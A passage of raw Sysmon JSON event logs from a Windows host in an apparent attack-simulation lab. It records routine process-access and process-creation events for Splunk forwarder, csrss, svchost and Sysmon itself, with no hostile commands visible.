C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001023940300}","TargetProcessId":"3748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.898\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nProcessId: 3780\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-001023940300}\r\nParentProcessId: 3748\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.898","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001076950300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-001023940300}","ParentProcessId":"3748","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001023940300}\r\nSourceProcessId: 3748\r\nSourceThreadId: 3744\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001023940300}","SourceProcessId":"3748","SourceThreadId":"3744","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001076950300}\r\nTargetProcessId: 3780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001076950300}","TargetProcessId":"3780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 